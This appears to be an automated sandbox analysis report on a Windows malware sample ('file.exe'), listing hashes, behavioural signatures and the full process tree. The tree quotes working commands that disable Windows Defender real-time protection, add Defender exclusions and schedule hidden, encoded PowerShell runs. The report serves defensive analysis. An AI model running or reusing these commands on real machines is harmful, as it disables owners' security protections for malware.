Analysis
-
max time kernel
150s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
31/10/2022, 22:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
a75ccd9681b2073ff1bf782d3a285592
-
SHA1
0cc720ea0d98bccc8a3807f9288e2bd05fc815fb
-
SHA256
7c74576432c1d96de5ab6f00f0027b2e4565743dc1362423e5370a5fc56ee191
-
SHA512
9e6d5ca17bf4916f7bd05b2e3709b1d58a728f33ae27de335cd979795507f9b5746b42fbef52149868a53ecd438a270c638bfbd2e1bf6ab37203478b49e9708f
-
SSDEEP
196608:91O1gxD17+PqlqyIIZH9MjTCuFwwO125FdW0:3O1iD1a2ZdMjTCYusFdn
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Executes dropped EXE 3 IoCs
pid Process 824 Install.exe 936 Install.exe 852 rdCtdiR.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 1380 file.exe 824 Install.exe 824 Install.exe 824 Install.exe 824 Install.exe 936 Install.exe 936 Install.exe 936 Install.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rdCtdiR.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rdCtdiR.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rdCtdiR.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 780 schtasks.exe 1956 schtasks.exe 1728 schtasks.exe 2008 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 9 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 396 powershell.EXE 396 powershell.EXE 396 powershell.EXE 780 powershell.EXE 780 powershell.EXE 780 powershell.EXE 2040 powershell.EXE 2040 powershell.EXE 2040 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 396 powershell.EXE Token: SeDebugPrivilege 780 powershell.EXE Token: SeDebugPrivilege 2040 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1380 wrote to memory of 824 1380 file.exe 27 PID 1380 wrote to memory of 824 1380 file.exe 27 PID 1380 wrote to memory of 824 1380 file.exe 27 PID 1380 wrote to memory of 824 1380 file.exe 27 PID 1380 wrote to memory of 824 1380 file.exe 27 PID 1380 wrote to memory of 824 1380 file.exe 27 PID 1380 wrote to memory of 824 1380 file.exe 27 PID 824 wrote to memory of 936 824 Install.exe 28 PID 824 wrote to memory of 936 824 Install.exe 28 PID 824 wrote to memory of 936 824 Install.exe 28 PID 824 wrote to memory of 936 824 Install.exe 28 PID 824 wrote to memory of 936 824 Install.exe 28 PID 824 wrote to memory of 936 824 Install.exe 28 PID 824 wrote to memory of 936 824 Install.exe 28 PID 936 wrote to memory of 2028 936 Install.exe 30 PID 936 wrote to memory of 2028 936 Install.exe 30 PID 936 wrote to memory of 2028 936 Install.exe 30 PID 936 wrote to memory of 2028 936 Install.exe 30 PID 936 wrote to memory of 2028 936 Install.exe 30 PID 936 wrote to memory of 2028 936 Install.exe 30 PID 936 wrote to memory of 2028 936 Install.exe 30 PID 936 wrote to memory of 1328 936 Install.exe 32 PID 936 wrote to memory of 1328 936 Install.exe 32 PID 936 wrote to memory of 1328 936 Install.exe 32 PID 936 wrote to memory of 1328 936 Install.exe 32 PID 936 wrote to memory of 1328 936 Install.exe 32 PID 936 wrote to memory of 1328 936 Install.exe 32 PID 936 wrote to memory of 1328 936 Install.exe 32 PID 1328 wrote to memory of 1440 1328 forfiles.exe 35 PID 1328 wrote to memory of 1440 1328 forfiles.exe 35 PID 1328 wrote to memory of 1440 1328 forfiles.exe 35 PID 1328 wrote to memory of 1440 1328 forfiles.exe 35 PID 1328 wrote to memory of 1440 1328 forfiles.exe 35 PID 1328 wrote to memory of 1440 1328 forfiles.exe 35 PID 1328 wrote to memory of 1440 1328 forfiles.exe 35 PID 2028 wrote to memory of 1376 2028 forfiles.exe 34 PID 2028 wrote to memory of 1376 2028 forfiles.exe 34 PID 2028 wrote to memory of 1376 2028 forfiles.exe 34 PID 2028 wrote to memory of 1376 2028 forfiles.exe 34 PID 2028 wrote to memory of 1376 2028 forfiles.exe 34 PID 2028 wrote to memory of 1376 2028 forfiles.exe 34 PID 2028 wrote to memory of 1376 2028 forfiles.exe 34 PID 1440 wrote to memory of 960 1440 cmd.exe 36 PID 1440 wrote to memory of 960 1440 cmd.exe 36 PID 1440 wrote to memory of 960 1440 cmd.exe 36 PID 1440 wrote to memory of 960 1440 cmd.exe 36 PID 1440 wrote to memory of 960 1440 cmd.exe 36 PID 1440 wrote to memory of 960 1440 cmd.exe 36 PID 1440 wrote to memory of 960 1440 cmd.exe 36 PID 1376 wrote to memory of 288 1376 cmd.exe 37 PID 1376 wrote to memory of 288 1376 cmd.exe 37 PID 1376 wrote to memory of 288 1376 cmd.exe 37 PID 1376 wrote to memory of 288 1376 cmd.exe 37 PID 1376 wrote to memory of 288 1376 cmd.exe 37 PID 1376 wrote to memory of 288 1376 cmd.exe 37 PID 1376 wrote to memory of 288 1376 cmd.exe 37 PID 1376 wrote to memory of 1580 1376 cmd.exe 38 PID 1376 wrote to memory of 1580 1376 cmd.exe 38 PID 1376 wrote to memory of 1580 1376 cmd.exe 38 PID 1376 wrote to memory of 1580 1376 cmd.exe 38 PID 1376 wrote to memory of 1580 1376 cmd.exe 38 PID 1376 wrote to memory of 1580 1376 cmd.exe 38 PID 1376 wrote to memory of 1580 1376 cmd.exe 38 PID 1440 wrote to memory of 592 1440 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:288
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1580
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:960
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:592
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEhzvxrPb" /SC once /ST 09:41:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEhzvxrPb"4⤵PID:1600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEhzvxrPb"4⤵PID:848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 22:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe\" KP /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1956
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9A6228B2-40B6-4D89-A88A-102951D5FBBE} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:524
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:964
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1276
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1092
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1124
-
C:\Windows\system32\taskeng.exetaskeng.exe {1B3DA9EC-DE32-43E4-AFF8-296227E6196C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1596
-
C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exeC:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe KP /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:852 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLdoXkBXq" /SC once /ST 17:46:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLdoXkBXq"3⤵PID:880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLdoXkBXq"3⤵PID:1136
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1780
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1956
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1696
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPZLeWFxT" /SC once /ST 01:42:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPZLeWFxT"3⤵PID:820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPZLeWFxT"3⤵PID:912
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:323⤵PID:1916
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:643⤵PID:992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:323⤵PID:1948
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:324⤵PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:643⤵PID:1768
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:644⤵PID:700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf"3⤵PID:548
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1780 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1648
-
-
